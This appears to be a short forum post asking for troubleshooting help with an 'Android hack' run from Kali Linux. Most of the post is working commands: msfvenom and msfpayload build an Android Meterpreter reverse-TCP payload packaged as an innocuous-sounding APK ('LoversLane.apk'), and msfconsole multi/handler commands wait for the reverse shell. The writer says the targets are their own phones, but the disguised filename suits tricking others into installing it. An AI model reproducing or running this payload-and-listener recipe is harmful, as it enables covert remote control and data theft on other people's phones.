Hello Ive been attmepting the Adroid Hack on my personal phone. My kali is loaded on a Vmware Debian x64
Im using a Samsung Galaxy S5 and 2 S4s. Noneof the phonesreturn an IP address to Kali when the apps are opened.
Ive created my payloads using MsfVenom and msfpayload.

msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.43.107 LPORT=4444 R > /root/LoversLane.apk

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.43.107 LPORT=4444 R > /root/LoversLane.apk

OPEN NEW TO START CONSOLE TYPE:
msfconsole
use multi/handler
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.107
set LPORT 4444
exploit